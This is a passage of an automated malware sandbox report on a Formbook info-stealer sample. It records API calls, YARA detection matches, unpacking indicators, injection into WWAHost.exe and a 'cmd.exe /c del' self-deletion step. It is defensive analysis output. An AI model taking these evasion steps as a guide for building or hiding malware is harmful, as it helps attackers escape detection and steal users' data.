            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_003382E0 NtClose,6_2_003382E0
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_00338390 NtAllocateVirtualMemory,6_2_00338390
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_003381AB NtCreateFile,6_2_003381AB
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_0033825A NtReadFile,6_2_0033825A
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_003382DD NtClose,6_2_003382DD
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 0_2_01BAABC30_2_01BAABC3
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 0_2_01BA15E00_2_01BA15E0
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 0_2_01BA2F7B0_2_01BA2F7B
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 0_2_01BA0EB80_2_01BA0EB8
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 0_2_01BA4B180_2_01BA4B18
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 0_2_01BA4B090_2_01BA4B09
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 0_2_01BA12A80_2_01BA12A8
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 0_2_01BA12980_2_01BA1298
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 0_2_01BA15D00_2_01BA15D0
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 0_2_01BA4D510_2_01BA4D51
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 0_2_01BA0EA50_2_01BA0EA5
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_004010301_2_00401030
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_00408C4B1_2_00408C4B
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_00408C501_2_00408C50
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_00408C0C1_2_00408C0C
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_0041B4931_2_0041B493
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_0041CD711_2_0041CD71
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_00402D871_2_00402D87
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_00402D901_2_00402D90
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_0041CE591_2_0041CE59
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_0041B7A61_2_0041B7A6
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_00402FB01_2_00402FB0
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_0113F9001_2_0113F900
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_011541201_2_01154120
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_0120E8241_2_0120E824
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_011F10021_2_011F1002
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_0115A8301_2_0115A830
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_0114B0901_2_0114B090
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_012020A81_2_012020A8
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_011620A01_2_011620A0
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_012028EC1_2_012028EC
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_01202B281_2_01202B28
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_0115AB401_2_0115AB40
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_0116EBB01_2_0116EBB0
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_011F03DA1_2_011F03DA
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_011FDBD21_2_011FDBD2
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_011EFA2B1_2_011EFA2B
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_012022AE1_2_012022AE
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_01202D071_2_01202D07
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_01130D201_2_01130D20
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_01201D551_2_01201D55
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_011625811_2_01162581
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_0114D5E01_2_0114D5E0
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_012025DD1_2_012025DD
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_0114841F1_2_0114841F
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_011FD4661_2_011FD466
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_01201FF11_2_01201FF1
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_0120DFCE1_2_0120DFCE
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_011FD6161_2_011FD616
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_01156E301_2_01156E30
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_01202EF71_2_01202EF7
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_03222B286_2_03222B28
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_0318EBB06_2_0318EBB0
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_03221FF16_2_03221FF1
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_0321DBD26_2_0321DBD2
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_03176E306_2_03176E30
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_032222AE6_2_032222AE
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_03222EF76_2_03222EF7
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_0315F9006_2_0315F900
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_03222D076_2_03222D07
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_03150D206_2_03150D20
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_031741206_2_03174120
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_03221D556_2_03221D55
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_031825816_2_03182581
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_0316D5E06_2_0316D5E0
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_032225DD6_2_032225DD
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_0316841F6_2_0316841F
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_032110026_2_03211002
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_0321D4666_2_0321D466
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_0316B0906_2_0316B090
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_032220A86_2_032220A8
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_031820A06_2_031820A0
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_032228EC6_2_032228EC
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_00328C0C6_2_00328C0C
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_00328C506_2_00328C50
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_00328C4B6_2_00328C4B
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_0033B4936_2_0033B493
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_0033CD716_2_0033CD71
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_00322D906_2_00322D90
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_00322D876_2_00322D87
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_0033CE596_2_0033CE59
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_00322FB06_2_00322FB0
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_0033B7A66_2_0033B7A6
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: String function: 0113B150 appears 54 times
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: String function: 0315B150 appears 35 times
            Source: JdtN8nIcLi8RQOi.exe, 00000000.00000002.677918274.0000000004A61000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamePositiveSign.dll< vs JdtN8nIcLi8RQOi.exe
            Source: JdtN8nIcLi8RQOi.exe, 00000000.00000002.675137695.0000000001080000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameThreeElementAsyncLocalValueMap.exe@ vs JdtN8nIcLi8RQOi.exe
            Source: JdtN8nIcLi8RQOi.exe, 00000000.00000002.676624298.0000000003A61000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameSoapName.dll2 vs JdtN8nIcLi8RQOi.exe
            Source: JdtN8nIcLi8RQOi.exe, 00000000.00000002.676064079.00000000035A0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamemscorrc.dllT vs JdtN8nIcLi8RQOi.exe
            Source: JdtN8nIcLi8RQOi.exe, 00000001.00000002.718379211.0000000002E26000.00000040.00000001.sdmpBinary or memory string: OriginalFilenameWWAHost.exej% vs JdtN8nIcLi8RQOi.exe
            Source: JdtN8nIcLi8RQOi.exe, 00000001.00000002.717394980.00000000013BF000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs JdtN8nIcLi8RQOi.exe
            Source: JdtN8nIcLi8RQOi.exe, 00000001.00000000.674352218.0000000000760000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameThreeElementAsyncLocalValueMap.exe@ vs JdtN8nIcLi8RQOi.exe
            Source: JdtN8nIcLi8RQOi.exeBinary or memory string: OriginalFilenameThreeElementAsyncLocalValueMap.exe@ vs JdtN8nIcLi8RQOi.exe
            Source: JdtN8nIcLi8RQOi.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
            Source: 00000001.00000002.717711099.0000000001440000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000001.00000002.717711099.0000000001440000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000001.00000002.717802806.0000000001470000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000001.00000002.717802806.0000000001470000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000000.00000002.677918274.0000000004A61000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000000.00000002.677918274.0000000004A61000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000006.00000002.1028678660.0000000000320000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000006.00000002.1028678660.0000000000320000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000001.00000002.714305814.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000001.00000002.714305814.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000006.00000002.1030008243.0000000002F00000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000006.00000002.1030008243.0000000002F00000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000006.00000002.1029358545.00000000024A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000006.00000002.1029358545.00000000024A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 1.2.JdtN8nIcLi8RQOi.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 1.2.JdtN8nIcLi8RQOi.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 1.2.JdtN8nIcLi8RQOi.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 1.2.JdtN8nIcLi8RQOi.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: classification engineClassification label: mal100.troj.evad.winEXE@7/1@18/12
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v2.0_32\UsageLogs\JdtN8nIcLi8RQOi.exe.logJump to behavior
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5648:120:WilError_01
            Source: JdtN8nIcLi8RQOi.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dllJump to behavior
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlpJump to behavior
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlpJump to behavior
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\SysWOW64\WWAHost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\SysWOW64\WWAHost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: JdtN8nIcLi8RQOi.exeReversingLabs: Detection: 21%
            Source: unknownProcess created: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe 'C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe'
            Source: unknownProcess created: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe
            Source: unknownProcess created: C:\Windows\SysWOW64\WWAHost.exe C:\Windows\SysWOW64\WWAHost.exe
            Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe'
            Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeProcess created: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeJump to behavior
            Source: C:\Windows\SysWOW64\WWAHost.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe'Jump to behavior
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeFile opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorrc.dllJump to behavior
            Source: JdtN8nIcLi8RQOi.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeFile opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9445_none_d08c58b4442ba54f\MSVCR80.dllJump to behavior
            Source: JdtN8nIcLi8RQOi.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
            Source: Binary string: WWAHost.pdb source: JdtN8nIcLi8RQOi.exe, 00000001.00000002.718229203.0000000002D70000.00000040.00000001.sdmp
            Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000002.00000000.693274413.0000000005A00000.00000002.00000001.sdmp
            Source: Binary string: WWAHost.pdbUGP source: JdtN8nIcLi8RQOi.exe, 00000001.00000002.718229203.0000000002D70000.00000040.00000001.sdmp
            Source: Binary string: wntdll.pdbUGP source: JdtN8nIcLi8RQOi.exe, 00000001.00000002.715992028.000000000122F000.00000040.00000001.sdmp, WWAHost.exe, 00000006.00000002.1030089804.0000000003130000.00000040.00000001.sdmp
            Source: Binary string: wntdll.pdb source: JdtN8nIcLi8RQOi.exe, WWAHost.exe
            Source: Binary string: mscorrc.pdb source: JdtN8nIcLi8RQOi.exe, 00000000.00000002.676064079.00000000035A0000.00000002.00000001.sdmp
            Source: Binary string: wscui.pdb source: explorer.exe, 00000002.00000000.693274413.0000000005A00000.00000002.00000001.sdmp

            Data Obfuscation:

            barindex
            .NET source code contains potential unpackerShow sources
            Source: JdtN8nIcLi8RQOi.exe, LoaderInformation.cs.Net Code: SafeFileMappingHandle System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 0.0.JdtN8nIcLi8RQOi.exe.fc0000.0.unpack, LoaderInformation.cs.Net Code: SafeFileMappingHandle System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 0.2.JdtN8nIcLi8RQOi.exe.fc0000.0.unpack, LoaderInformation.cs.Net Code: SafeFileMappingHandle System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 1.2.JdtN8nIcLi8RQOi.exe.6a0000.1.unpack, LoaderInformation.cs.Net Code: SafeFileMappingHandle System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 1.0.JdtN8nIcLi8RQOi.exe.6a0000.0.unpack, LoaderInformation.cs.Net Code: SafeFileMappingHandle System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 0_2_01BAD0F4 push ecx; retf 0_2_01BAD0F5
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_0041604B pushfd ; retf 1_2_0041604C
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_00407008 push esi; ret 1_2_00407009
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_0041B3F2 push eax; ret 1_2_0041B3F8
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_0041B3FB push eax; ret 1_2_0041B462
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_0041B3A5 push eax; ret 1_2_0041B3F8
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_0041B45C push eax; ret 1_2_0041B462
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 1_2_0118D0D1 push ecx; ret 1_2_0118D0E4
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_031AD0D1 push ecx; ret 6_2_031AD0E4
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_00327008 push esi; ret 6_2_00327009
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_0033604B pushfd ; retf 6_2_0033604C
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_0033B3A5 push eax; ret 6_2_0033B3F8
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_0033B3F2 push eax; ret 6_2_0033B3F8
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_0033B3FB push eax; ret 6_2_0033B462
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_0033B45C push eax; ret 6_2_0033B462
            Source: initial sampleStatic PE information: section name: .text entropy: 7.21231975694
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeProcess information set: NOOPENFILEERRORBOX